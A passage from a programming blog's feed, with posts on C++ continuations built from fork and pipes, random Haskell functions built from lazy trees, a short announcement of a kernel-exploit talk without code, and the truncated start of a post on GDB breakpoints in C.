href="http://en.wikipedia.org/wiki/C%2B%2B11">C++11</a> features we'll use.</p> <p><code>call_cc</code> stands for &quot;call with current continuation&quot;, and that's exactly what it does. <code>call_cc(f)</code> will call <code>f</code>, and return whatever <code>f</code> returns. The interesting part is that it passes to <code>f</code> an instance of our <code>cont</code> class, which represents all the stuff that's going to happen in the program after <code>f</code> returns. That <code>cont</code> object overloads <code>operator()</code> and so can be called like a function. If it's called with some argument <code>x</code>, the program behaves as though <code>f</code> had returned <code>x</code>.</p> <p>The types reflect this usage. The type parameter <code>T</code> in <code>cont&lt;T&gt;</code> is the return type of the function passed to <code>call_cc</code>. It's also the type of values accepted by <code>cont&lt;T&gt;::operator()</code>.</p><p>Here's a small example.</p> <pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">int</span> f(cont&lt;<span class="dt">int</span>&gt; k) {<br /> std::cout &lt;&lt; <span class="st">&quot;f called&quot;</span> &lt;&lt; std::endl;<br /> k(<span class="dv">1</span>);<br /> std::cout &lt;&lt; <span class="st">&quot;k returns&quot;</span> &lt;&lt; std::endl;<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}<br /><br /><span class="dt">int</span> main() {<br /> std::cout &lt;&lt; <span class="st">&quot;f returns &quot;</span> &lt;&lt; call_cc&lt;<span class="dt">int</span>&gt;(f) &lt;&lt; std::endl;<br />}</code></pre> <p>When we run this code we get:</p><pre><code>f called<br />f returns 1<br /></code></pre><p>We don't see the &quot;<code>k returns</code>&quot; message. Instead, calling <code>k(1)</code> bails out of <code>f</code> early, and forces it to return 1. This would happen even if we passed <code>k</code> to some deeply nested function call, and invoked it there.</p> <p>This nonlocal return is kind of like throwing an exception, and is not that surprising. More exciting things happen if a continuation outlives the function call it came from.</p><pre class="sourceCode"><code class="sourceCode cpp">boost::optional&lt; cont&lt;<span class="dt">int</span>&gt; &gt; global_k;<br /><br /><span class="dt">int</span> g(cont&lt;<span class="dt">int</span>&gt; k) {<br /> std::cout &lt;&lt; <span class="st">&quot;g called&quot;</span> &lt;&lt; std::endl;<br /> global_k = k;<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}<br /><br /><span class="dt">int</span> main() {<br /> std::cout &lt;&lt; <span class="st">&quot;g returns &quot;</span> &lt;&lt; call_cc&lt;<span class="dt">int</span>&gt;(g) &lt;&lt; std::endl;<br /><br /> <span class="kw">if</span> (global_k)<br /> (*global_k)(<span class="dv">1</span>);<br />}</code></pre> <p>When we run this, we get:</p><pre><code>g called<br />g returns 0<br />g returns 1<br /></code></pre><p><code>g</code> is called once, and returns twice! When called, <code>g</code> saves the current continuation in a global variable. After <code>g</code> returns, <code>main</code> calls that continuation, and <code>g</code> returns again with a different value.</p> <p>What value should <code>global_k</code> have before <code>g</code> is called? There's no such thing as a &quot;default&quot; or &quot;uninitialized&quot; <code>cont&lt;T&gt;</code>. We solve this problem by wrapping it with <a href="http://www.boost.org/libs/optional/index.html"><code>boost::optional</code></a>. We use the resulting object much like a pointer, checking for &quot;null&quot; and then dereferencing. The difference is that <code>boost::optional</code> manages storage for the underlying value, if any.</p> <p>Why isn't this code an infinite loop? Because <strong>invoking a <code>cont&lt;T&gt;</code> also resets global state</strong> to the values it had when the continuation was captured. The second time <code>g</code> returns, <code>global_k</code> has been reset to the &quot;null&quot; <code>optional</code> value. This is <strong>unlike Scheme's <code>call/cc</code> and most other continuation systems</strong>. It turns out to be a serious limitation, though it's sometimes convenient. The reason for this behavior is that invoking a continuation is implemented as a transfer of control to another process. More on that later.</p> <h1 id="backtracking">Backtracking</h1><p>We can use continuations to implement backtracking, as found in <a href="http://en.wikipedia.org/wiki/Logic_programming">logic programming</a> languages. Here is a suitable interface.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">bool</span> guess();<br /><span class="dt">void</span> fail();</code></pre><p>We will use <code>guess</code> as though it has a magical ability to predict the future. We assume it will only return <code>true</code> if doing so results in a program that never calls <code>fail</code>. Here is the implementation.</p> <pre class="sourceCode"><code class="sourceCode cpp">boost::optional&lt; cont&lt;<span class="dt">bool</span>&gt; &gt; checkpoint;<br /><br /><span class="dt">bool</span> guess() {<br /> <span class="kw">return</span> call_cc&lt;<span class="dt">bool</span>&gt;( [](cont&lt;<span class="dt">bool</span>&gt; k) {<br /> checkpoint = k;<br /> <span class="kw">return</span> <span class="kw">true</span>;<br /> } );<br />}<br /><br /><span class="dt">void</span> fail() {<br /> <span class="kw">if</span> (checkpoint) {<br /> (*checkpoint)(<span class="kw">false</span>);<br /> } <span class="kw">else</span> {<br /> std::cerr &lt;&lt; <span class="st">&quot;Nothing to be done.&quot;</span> &lt;&lt; std::endl;<br /> exit(<span class="dv">1</span>);<br /> }<br />}</code></pre> <p><code>guess</code> invokes <code>call_cc</code> on a <a href="http://en.wikipedia.org/wiki/Anonymous_function#C.2B.2B">lambda expression</a>, which saves the current continuation and returns <code>true</code>. A subsequent call to <code>fail</code> will invoke this continuation, retrying execution in a world where <code>guess</code> had returned <code>false</code> instead. In Scheme et al, we would store a whole stack of continuations. But invoking our <code>cont&lt;bool&gt;</code> resets global state, including the <code>checkpoint</code> variable itself, so we only need to explicitly track the most recent continuation.</p> <p>Now we can implement the integer factoring example from &quot;<a href="http://homepage.mac.com/sigfpe/Computing/continuations.html">Continuations in C</a>&quot;.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">int</span> integer(<span class="dt">int</span> m, <span class="dt">int</span> n) {<br /> <span class="kw">for</span> (<span class="dt">int</span> i=m; i&lt;=n; i++) {<br /> <span class="kw">if</span> (guess())<br /> <span class="kw">return</span> i;<br /> }<br /> fail();<br />}<br /><br /><span class="dt">void</span> factor(<span class="dt">int</span> n) {<br /> <span class="dt">const</span> <span class="dt">int</span> i = integer(<span class="dv">2</span>, <span class="dv">100</span>);<br /> <span class="dt">const</span> <span class="dt">int</span> j = integer(<span class="dv">2</span>, <span class="dv">100</span>);<br /><br /> <span class="kw">if</span> (i*j != n)<br /> fail();<br /><br /> std::cout &lt;&lt; i &lt;&lt; <span class="st">&quot; * &quot;</span> &lt;&lt; j &lt;&lt; <span class="st">&quot; = &quot;</span> &lt;&lt; n &lt;&lt; std::endl;<br />}</code></pre> <p><code>factor(n)</code> will guess two integers, and fail if their product is not <code>n</code>. Calling <code>factor(391)</code> will produce the output</p><pre><code>17 * 23 = 391<br /></code></pre><p>after a moment's delay. In fact, you might see this <em>after</em> your shell prompt has returned, because the output is produced by a thousand-generation descendant of the process your shell created.</p><h1 id="solving-a-maze">Solving a maze</h1> <p>For a more substantial use of backtracking, let's solve a maze.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">const</span> <span class="dt">int</span> maze_size = <span class="dv">15</span>;<br /><span class="dt">char</span> maze[] =<br /> <span class="st">&quot;X-------------+</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot; | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;|--+ | | | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | | --+ |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;|-+---+--+- | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | ---+-+- |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| +-+-+--| |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | | |--- |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| | |</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;|--- -+-------|</span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;| </span><span class="ch">\n</span><span class="st">&quot;</span><br /> <span class="st">&quot;+------------- </span><span class="ch">\n</span><span class="st">&quot;</span>;<br /><br /><span class="dt">void</span> solve_maze() {<br /> <span class="dt">int</span> x=<span class="dv">0</span>, y=<span class="dv">0</span>;<br /><br /> <span class="kw">while</span> ((x != maze_size<span class="dv">-1</span>)<br /> || (y != maze_size<span class="dv">-1</span>)) {<br /><br /> <span class="kw">if</span> (guess()) x++;<br /> <span class="kw">else</span> <span class="kw">if</span> (guess()) x--;<br /> <span class="kw">else</span> <span class="kw">if</span> (guess()) y++;<br /> <span class="kw">else</span> y--;<br /><br /> <span class="kw">if</span> ( (x &lt; <span class="dv">0</span>) || (x &gt;= maze_size) ||<br /> (y &lt; <span class="dv">0</span>) || (y &gt;= maze_size) )<br /> fail();<br /><br /> <span class="dt">const</span> <span class="dt">int</span> i = y*(maze_size<span class="dv">+1</span>) + x;<br /> <span class="kw">if</span> (maze[i] != ' ')<br /> fail();<br /> maze[i] = 'X';<br /> }<br /><br /> <span class="kw">for</span> (<span class="dt">char</span> c : maze) {<br /> <span class="kw">if</span> (c == 'X')<br /> std::cout &lt;&lt; <span class="st">&quot;</span><span class="ch">\e</span><span class="st">[1;32mX</span><span class="ch">\e</span><span class="st">[0m&quot;</span>;<br /> <span class="kw">else</span><br /> std::cout &lt;&lt; c;<br /> }<br />}</code></pre> <p>Whether code or prose, the algorithm is pretty simple. Start at the upper-left corner. As long as we haven't reached the lower-right corner, guess a direction to move. Fail if we go off the edge, run into a wall, or find ourselves on a square we already visited.</p><p>Once we've reached the goal, we <a href="http://en.wikipedia.org/wiki/C%2B%2B11#Range-based_for-loop">iterate</a> over the <code>char</code> array and print it out with some rad <a href="http://pueblo.sourceforge.net/doc/manual/ansi_color_codes.html">ANSI color codes</a>.</p><p>Once again, we're making good use of the fact that our continuations reset global state. That's why we see <code>'X'</code> marks not on the failed detours, but only on a successful path through the maze. Here's what it looks like.</p> <p><pre><code class="sourceCode"><br /><span class="kw">X</span>-------------+<br /><span class="kw">XXXXXXXX</span>| |<br />|--+ |<span class="kw">X</span>| | |<br />| | |<span class="kw">X</span>| --+ |<br />| |<span class="kw">XXXXX</span>| |<br />|-+---+--+-<span class="kw">X</span>| |<br />| |<span class="kw">XXX</span> | <span class="kw">XXX</span>|<br />| |<span class="kw">X</span>|<span class="kw">X</span>---+-+-<span class="kw">X</span>|<br />|<span class="kw">XXX</span>|<span class="kw">XXXXXX</span>|<span class="kw">XX</span>|<br />|<span class="kw">X</span>+-+-+--|<span class="kw">XXX</span> |<br />|<span class="kw">X</span>| | |--- |<br />|<span class="kw">XXXX</span> | |<br />|---<span class="kw">X</span>-+-------|<br />| <span class="kw">XXXXXXXXXXX</span><br />+-------------<span class="kw">X</span><br /></code></pre></p> <h1 id="excess-backtracking">Excess backtracking</h1><p>We can run both examples in a single program.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">int</span> main() {<br /> factor(<span class="dv">391</span>);<br /> solve_maze();<br />}</code></pre> <p>If we change the maze to be unsolvable, we'll get:</p><pre><code>17 * 23 = 391<br />23 * 17 = 391<br />Nothing to be done.<br /></code></pre><p>Factoring 391 a different way won't change the maze layout, but the program doesn't know that. We can add a <a href="http://en.wikipedia.org/wiki/Cut_%28logic_programming%29">cut</a> primitive to eliminate unwanted backtracking.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">void</span> cut() {<br /> checkpoint = boost::none;<br />}<br /><br /><span class="dt">int</span> main() {<br /> factor(<span class="dv">391</span>);<br /> cut();<br /> solve_maze();<br />}</code></pre><p></p> <h1 id="the-implementation">The implementation</h1><p>For such a crazy idea, the code to implement <code>call_cc</code> with <code>fork</code> is actually pretty reasonable. Here's the core of it.</p><pre class="sourceCode"><code class="sourceCode cpp"><span class="kw">template</span> &lt;<span class="kw">typename</span> T&gt;<br /><span class="co">// static</span><br />T cont&lt;T&gt;::call_cc(call_cc_arg f) {<br /> <span class="dt">int</span> fd[<span class="dv">2</span>];<br /> pipe(fd);<br /> <span class="dt">int</span> read_fd = fd[<span class="dv">0</span>];<br /> <span class="dt">int</span> write_fd = fd[<span class="dv">1</span>];<br /><br /> <span class="kw">if</span> (fork()) {<br /> <span class="co">// parent</span><br /> close(read_fd);<br /> <span class="kw">return</span> f( cont&lt;T&gt;(write_fd) );<br /> } <span class="kw">else</span> {<br /> <span class="co">// child</span><br /> close(write_fd);<br /> <span class="dt">char</span> buf[<span class="kw">sizeof</span>(T)];<br /> <span class="kw">if</span> (read(read_fd, buf, <span class="kw">sizeof</span>(T)) &lt; ssize_t(<span class="kw">sizeof</span>(T)))<br /> exit(<span class="dv">0</span>);<br /> close(read_fd);<br /> <span class="kw">return</span> *<span class="kw">reinterpret_cast</span>&lt;T*&gt;(buf);<br /> }<br />}<br /><br /><span class="kw">template</span> &lt;<span class="kw">typename</span> T&gt;<br /><span class="dt">void</span> cont&lt;T&gt;::impl::invoke(<span class="dt">const</span> T &amp;x) {<br /> write(m_pipe, &amp;x, <span class="kw">sizeof</span>(T));<br /> exit(<span class="dv">0</span>);<br />}</code></pre> <p>To capture a continuation, we fork the process. The resulting processes share a <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/pipe.2.html">pipe</a> which was created before the fork. The parent process will call <code>f</code> immediately, passing a <code>cont&lt;T&gt;</code> object that holds onto the write end of this pipe. If that continuation is invoked with some argument <code>x</code>, the parent process will send <code>x</code> down the pipe and then exit. The child process wakes up from its <code>read</code> call, and returns <code>x</code> from <code>call_cc</code>.</p> <p>There are a few more implementation details.</p><ul class="incremental"><li><p>If the parent process exits, it will close the write end of the pipe, and the child's <code>read</code> will return 0, i.e. end-of-file. This prevents a buildup of unused continuation processes. But what if the parent deletes the last copy of some <code>cont&lt;T&gt;</code>, yet keeps running? We'd like to kill the corresponding child process immediately.</p><p>This sounds like a use for a reference-counted smart pointer, but we want to hide this detail from the user. So we split off a private implementation class, <code>cont&lt;T&gt;::impl</code>, with a destructor that calls <code>close</code>. The user-facing class <code>cont&lt;T&gt;</code> holds a <a href="http://en.cppreference.com/w/cpp/memory/shared_ptr"><code>std::shared_ptr</code></a> to a <code>cont&lt;T&gt;::impl</code>. And <code>cont&lt;T&gt;::operator()</code> simply calls <code>cont&lt;T&gt;::impl::invoke</code> through this pointer.</p></li> <li><p>It would be nice to tell the compiler that <code>cont&lt;T&gt;::operator()</code> won't return, to avoid warnings like &quot;control reaches end of non-void function&quot;. GCC provides the <a href="http://gcc.gnu.org/onlinedocs/gcc/Function-Attributes.html#index-g_t_0040code_007bnoreturn_007d-function-attribute-2543"><code>noreturn</code> attribute</a> for this purpose.</p></li><li><p>We want the <code>cont&lt;T&gt;</code> constructor to be private, so we had to make <code>call_cc</code> a static member function of that class. But the examples above use a free function <code>call_cc&lt;T&gt;</code>. It's easiest to implement the latter as a 1-line function that calls the former. The alternative is to make it a <a href="http://www.parashift.com/c++-faq-lite/friends.html">friend</a> function of <code>cont&lt;T&gt;</code>, which requires some forward declarations and other noise.</p></li> </ul><p>There are a number of limitations too.</p><ul class="incremental"><li><p>As noted, the forked child process doesn't see changes to the parent's global state. This precludes some interesting uses of continuations, like implementing <a href="http://en.wikipedia.org/wiki/Continuation#Coroutines">coroutines</a>. In fact, I had trouble coming up with any application other than backtracking. You could work around this limitation with <a href="http://www.boost.org/doc/libs/1_48_0/doc/html/interprocess/quick_guide.html">shared memory</a>, but it seemed like too much hassle.</p></li><li><p>Each captured continuation can only be invoked once. This is easiest to observe if the code using continuations also invokes <code>fork</code> directly. It could possibly be fixed with additional <code>fork</code>ing inside <code>call_cc</code>.</p></li> <li><p>Calling a continuation sends the argument through a pipe using a naive byte-for-byte copy. So the argument needs to be <a href="http://www.fnal.gov/docs/working-groups/fpcltf/Pkg/ISOcxx/doc/POD.html">Plain Old Data</a>, and had better not contain pointers to anything not shared by the two processes. This means we can't send continuations through other continuations, sad to say.</p></li><li><p>I left out the error handling you would expect in serious code, because this is anything but.</p></li><li><p>Likewise, I'm assuming that a single <code>write</code> and <code>read</code> will suffice to send the value. Robust code will need to loop until completion, handle <code>EINTR</code>, etc. Or use some higher-level IPC mechanism.</p></li><li><p>At some size, stack-allocating the receive buffer will become a problem.</p></li> <li><p>It's slow. Well, actually, I'm impressed with the speed of <code>fork</code> on Linux. My machine solves both backtracking problems in about a second, <code>fork</code>ing about 2000 processes along the way. You can speed it up more with <a href="http://9fans.net/archive/2009/02/422">static linking</a>. But it's still far more overhead than the alternatives.</p></li></ul><p>As usual, you can get the code from <a href="https://github.com/kmcallister/cccallcc">GitHub</a>.</p>http://mainisusuallyafunction.blogspot.com/2012/02/continuations-in-c-with-fork.htmlnoreply@blogger.com (keegan)5tag:blogger.com,1999:blog-1563623855220143059.post-3013561900404693703Thu, 02 Feb 2012 21:24:00 +00002012-02-02T13:35:21.740-08:00codecomputabilityhaskellrandomGenerating random functions<p>How can we pick a random Haskell function? Specifically, we want to write an IO action</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">randomFunction </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>)</code></pre><p>with this behavior:</p><ul class="incremental"><li><p>It produces a function of type <code>Integer -&gt; Bool</code>.</p></li><li><p>It always produces a total function — a function which never throws an exception or enters an infinite loop.</p></li><li><p>It is equally likely to produce <em>any</em> such function.</p></li></ul><p>This is tricky, because there are infinitely many such functions (more on that later).</p><p>In another language we might produce something which looks like a function, but actually flips a coin on each new integer input. It would use mutable state to remember previous results, so that future calls will be consistent. But the Haskell type we gave for <code>randomFunction</code> forbids this approach. <code>randomFunction</code> uses IO effects to pick a random function, but the function it picks has access to neither coin flips nor mutable state.</p><p>Alternatively, we could build a lazy infinite data structure containing all the <code>Bool</code> answers we need. <code>randomFunction</code> could generate an <a href="http://lambda.haskell.org/platform/doc/current/ghc-doc/libraries/random-1.0.0.3/System-Random.html#v:randomRs">infinite list of random <code>Bool</code>s</a>, and produce a function <code>f</code> which indexes into that list. But this indexing will be inefficient in space and time. If the user calls <code>(f 10000000)</code>, we'll have to run 10,000,000 steps of the pseudo-random number generator, and build 10,000,000 list elements, before we can return a single <code>Bool</code> result.</p><p>We can improve this considerably by using a different infinite data structure. Though our solution is pure functional code, we <em>do</em> end up relying on mutation — the implicit mutation by which lazy thunks become evaluated data.</p><h1 id="the-data-structure">The data structure</h1><p></p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">import</span> <span class="dt">System.Random</span><br /><span class="kw">import</span> <span class="dt">Data.List</span> ( genericIndex )</code></pre><p>Our data structure is an infinite binary tree:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="kw">data</span> <span class="dt">Tree</span> <span class="fu">=</span> <span class="dt">Node</span> <span class="dt">Bool</span> <span class="dt">Tree</span> <span class="dt">Tree</span></code></pre><p>We can interpret such a tree as a function from non-negative <code>Integer</code>s to <code>Bool</code>s. If the <code>Integer</code> argument is zero, the root node holds our <code>Bool</code> answer. Otherwise, we shift off the least-significant bit of the argument, and look at the left or right subtree depending on that bit.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">get </span><span class="ot">::</span> <span class="dt">Tree</span> <span class="ot">-&gt;</span> (<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>)<br />get (<span class="dt">Node</span> b _ _) <span class="dv">0</span> <span class="fu">=</span> b<br />get (<span class="dt">Node</span> _ x y) n <span class="fu">=</span><br /> <span class="kw">case</span> <span class="fu">divMod</span> n <span class="dv">2</span> <span class="kw">of</span><br /> (m, <span class="dv">0</span>) <span class="ot">-&gt;</span> get x m<br /> (m, _) <span class="ot">-&gt;</span> get y m</code></pre><p>Now we need to build a suitable tree, starting from a <a href="http://lambda.haskell.org/platform/doc/current/ghc-doc/libraries/random-1.0.0.3/System-Random.html#t:StdGen">random number generator state</a>. The standard <code>System.Random</code> module is not going to win any <a href="http://www.serpentine.com/blog/2009/09/19/a-new-pseudo-random-number-generator-for-haskell/">speed contests</a>, but it does have one extremely nice property: it supports an operation</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">split </span><span class="ot">::</span> <span class="dt">StdGen</span> <span class="ot">-&gt;</span> (<span class="dt">StdGen</span>, <span class="dt">StdGen</span>)</code></pre><p>The two generator states returned by <code>split</code> will (ideally) produce two independent streams of random values. We use <code>split</code> at each node of the infinite tree.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">build </span><span class="ot">::</span> <span class="dt">StdGen</span> <span class="ot">-&gt;</span> <span class="dt">Tree</span><br />build g0 <span class="fu">=</span><br /> <span class="kw">let</span> (b, g1) <span class="fu">=</span> random g0<br /> (g2, g3) <span class="fu">=</span> split g1<br /> <span class="kw">in</span> <span class="dt">Node</span> b (build g2) (build g3)</code></pre><p>This is a recursive function with no base case. Conceptually, it produces an infinite tree. Operationally, it produces a single <code>Node</code> constructor, whose fields are lazily-deferred computations. As <code>get</code> explores this notional infinite tree, new <code>Node</code>s are created and randomness generated on demand.</p><p><code>get</code> traverses one level per bit of its input integer. So looking up the integer <em>n</em> involves traversing and possibly creating <span style="white-space: nowrap;"><em>O</em>(log <em>n</em>)</span> nodes. This suggests good space and time efficiency, though only testing will say for sure.</p><p>Now we have all the pieces to solve the original puzzle. We build two trees, one to handle positive numbers and another for negative numbers.</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">randomFunction </span><span class="ot">::</span> <span class="dt">IO</span> (<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>)<br />randomFunction <span class="fu">=</span> <span class="kw">do</span><br /> neg <span class="ot">&lt;-</span> build <span class="ot">`fmap`</span> newStdGen<br /> pos <span class="ot">&lt;-</span> build <span class="ot">`fmap`</span> newStdGen<br /> <span class="kw">let</span> f n <span class="fu">|</span> n <span class="fu">&lt;</span> <span class="dv">0</span> <span class="fu">=</span> get neg (<span class="fu">-</span>n)<br /> <span class="fu">|</span> <span class="fu">otherwise</span> <span class="fu">=</span> get pos n<br /> <span class="fu">return</span> f</code></pre><p></p><h1 id="testing">Testing</h1><p>Here's some code which helps us visualize one of these functions in the vicinity of zero:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">test </span><span class="ot">::</span> (<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>) <span class="ot">-&gt;</span> <span class="dt">IO</span> ()<br />test f <span class="fu">=</span> <span class="fu">putStrLn</span> <span class="fu">$</span> <span class="fu">map</span> (char <span class="fu">.</span> f) [<span class="fu">-</span><span class="dv">40</span><span class="fu">..</span><span class="dv">40</span>] <span class="kw">where</span><br /> char <span class="dt">False</span> <span class="fu">=</span> <span class="ch">' '</span><br /> char <span class="dt">True</span> <span class="fu">=</span> <span class="ch">'-'</span></code></pre><p>Now we can test <code>randomFunction</code> in GHCi:</p><pre><code><span class="Prompt">λ&gt;</span> <span class="Entry">randomFunction &gt;&gt;= test</span><br />---- - --- - - - - -- - - - -- --- -- -- - -- - - -- --- --<br /><span class="Prompt">λ&gt;</span> <span class="Entry">randomFunction &gt;&gt;= test</span><br />- ---- - - - - - - -- - - --- --- -- - -- - -- - - - - - -- - <br /><span class="Prompt">λ&gt;</span> <span class="Entry">randomFunction &gt;&gt;= test</span><br />- --- - - - -- --- - -- - - - - - ---- - - --- - - -<br /></code></pre><p>Each result from <code>randomFunction</code> is indeed a function: it always gives the same output for a given input. This much should be clear from the fact that we haven't used any <a href="http://lambda.haskell.org/platform/doc/current/ghc-doc/libraries/base-4.3.1.0/System-IO-Unsafe.html">unsafe shenanigans</a>. But we can also demonstrate it empirically:</p><pre><code><span class="Prompt">λ&gt;</span> <span class="Entry">f &lt;- randomFunction</span><br /><span class="Prompt">λ&gt;</span> <span class="Entry">test f</span><br />- ----- - - -- - - --- -- - - - - - - -- - - ---- - - - - - --- <br /><span class="Prompt">λ&gt;</span> <span class="Entry">test f</span><br />- ----- - - -- - - --- -- - - - - - - -- - - ---- - - - - - --- <br /></code></pre><p>Let's also test the speed on some very large arguments:</p><pre><code><span class="Prompt">λ&gt;</span> <span class="Entry">:set +s</span><br /><span class="Prompt">λ&gt;</span> <span class="Entry">f 10000000</span><br />True<br />(0.03 secs, 12648232 bytes)<br /><span class="Prompt">λ&gt;</span> <span class="Entry">f (2^65536)</span><br />True<br />(1.10 secs, 569231584 bytes)<br /><span class="Prompt">λ&gt;</span> <span class="Entry">f (2^65536)</span><br />True<br />(0.26 secs, 426068040 bytes)<br /></code></pre><p>The second call with <code>2^65536</code> is faster because the tree nodes already exist in memory. We can expect our tests to be faster yet if we compile with <code>ghc -O</code> rather than using GHCi's bytecode interpreter.</p><h1 id="how-many-functions">How many functions?</h1><p>Assume we have infinite memory, so that <code>Integer</code>s really can be unboundedly large. And let's ignore negative numbers, for simplicity. How many total functions of type <code>Integer -&gt; Bool</code> are there?</p><p>Suppose we made an infinite list <code>xs</code> of all such functions. Now consider this definition:</p><pre class="sourceCode"><code class="sourceCode haskell"><span class="ot">diag </span><span class="ot">::</span> [<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>] <span class="ot">-&gt;</span> (<span class="dt">Integer</span> <span class="ot">-&gt;</span> <span class="dt">Bool</span>)<br />diag xs n <span class="fu">=</span> <span class="fu">not</span> <span class="fu">$</span> genericIndex xs n n</code></pre><p>For an argument <code>n</code>, <code>diag xs</code> looks at what the <code>n</code>th function of <code>xs</code> would return, and returns the opposite. This means the function <code>diag xs</code> differs from every function in our supposedly comprehensive list of functions. This contradiction shows that there are <a href="http://en.wikipedia.org/wiki/Uncountable_set">uncountably many</a> total functions of type <code>Integer -&gt; Bool</code>. It's closely related to <a href="http://en.wikipedia.org/wiki/Cantor%27s_diagonal_argument">Cantor's diagonal argument</a> that the real numbers are uncountable.</p><p>But wait, there are only countably many Haskell programs! In fact, you can encode each one as a number. There may be uncountably many functions, but there are only a countable number of <em>computable</em> functions. So the proof breaks down if you restrict it to a real programming language like Haskell.</p><p>In that context, the existence of <code>xs</code> implies that there is some <em>algorithm</em> to enumerate the computable total functions. This is the assumption we ultimately contradict. The set of computable total functions is not <a href="http://en.wikipedia.org/wiki/Recursively_enumerable_language">recursively enumerable</a>, even though it is countable. Intuitively, to produce a single element of this set, we would have to verify that the function halts on every input, which is <a href="http://en.wikipedia.org/wiki/Halting_problem">impossible in the general case</a>.</p><p>Now let's revisit <code>randomFunction</code>. Any function it produces is computable: the algorithm is a combination of the pseudo-random number procedure and our tree traversal. In this sense, <code>randomFunction</code> provides extremely poor randomness; it only selects values from a particular <a href="http://en.wikipedia.org/wiki/Null_set">measure zero</a> subset of its result type! But if you read the type constructor <code>(-&gt;)</code> as &quot;computable function&quot;, as one should in a programming language, then <code>randomFunction</code> is closer to doing what it says it does.</p><p><strong>Edit:</strong> See also Luke Palmer's <a href="http://lukepalmer.wordpress.com/2012/01/26/computably-uncountable/">recent article on this subject</a>.</p> <h1 id="see-also">See also</h1><p>The libraries <a href="http://hackage.haskell.org/package/data-memocombinators">data-memocombinators</a> and <a href="http://hackage.haskell.org/package/MemoTrie">MemoTrie</a> use similar structures, not for building random functions but for <a href="http://en.wikipedia.org/wiki/Memoization">memoizing</a> existing ones.</p><p>You can download this post as a <a href="https://github.com/kmcallister/blog-misc/blob/master/random-function/random-function.lhs">Literate Haskell file</a> and play with the code.</p>http://mainisusuallyafunction.blogspot.com/2012/02/generating-random-functions.htmlnoreply@blogger.com (keegan)1tag:blogger.com,1999:blog-1563623855220143059.post-8551602144136131794Sat, 28 Jan 2012 17:02:00 +00002012-01-28T09:02:23.660-08:00codekernelsecurityslidessystemsWriting kernel exploits<p>Yesterday I gave a talk about writing kernel exploits. I've posted the <a href="http://ugcs.net/~keegan/talks/kernel-exploit/talk.pdf">slides [PDF]</a>. Here is the original description:</p><blockquote><p>Did you know that a NULL pointer can compromise your entire system? Do you know how UNIX pipes, multithreading, and an obscure network protocol from 1981 are combined to take over Linux machines today? OS kernels are full of strange and interesting vulnerabilities, thanks to the subtle nature of systems code. And the kernel's ultimate authority is the ultimate prize for an attacker.</p><p>In this talk you will learn how kernel exploits work, with detailed code examples. Compared to userspace, exploiting the kernel requires a whole different bag of tricks, and we'll cover some of the most important ones. We will focus on Linux systems and x86 hardware, though most ideas will generalize. We'll start with a few toy examples, then look at some real, high-profile Linux exploits from the past two years.</p><p>You will also see how to protect your own Linux machines against kernel exploits. We'll talk about the continual cat-and-mouse game between system administrators and those who would attack even hardened kernels.</p></blockquote><p>Thanks again to <a href="http://sipb.mit.edu/">SIPB</a> for giving me a venue to talk about whatever I find interesting.</p>http://mainisusuallyafunction.blogspot.com/2012/01/writing-kernel-exploits.htmlnoreply@blogger.com (keegan)5tag:blogger.com,1999:blog-1563623855220143059.post-3687144062173092177Thu, 19 Jan 2012 17:51:00 +00002012-01-19T09:51:52.208-08:00ccodedebugginggdbEmbedding GDB breakpoints in C source code<p>Have you ever wanted to embed <a href="http://www.gnu.org/software/gdb/">GDB</a> breakpoints in C source code?</p><pre class="sourceCode"><code class="sourceCode c"><span class="dt">int</span> main() {<br /> printf(<span class="st">&quot;Hello,</span><span class="ch">\n</span><span class="st">&quot;</span>);<br /> EMBED_BREAKPOINT;<br /> printf(<span class="st">&quot;world!</span><span class="ch">\n</span><span class="st">&quot;</span>);<br /> EMBED_BREAKPOINT;<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}</code></pre><p>One way is to directly insert your CPU's breakpoint instruction. On x86:</p><pre class="sourceCode"><code class="sourceCode c"><span class="ot">#define EMBED_BREAKPOINT</span> <span class="kw">asm</span> <span class="kw">volatile</span> (<span class="st">&quot;int3;&quot;</span>)</code></pre><p>There are at least two problems with this approach:</p><ul class="incremental"><li><p>They aren't real GDB 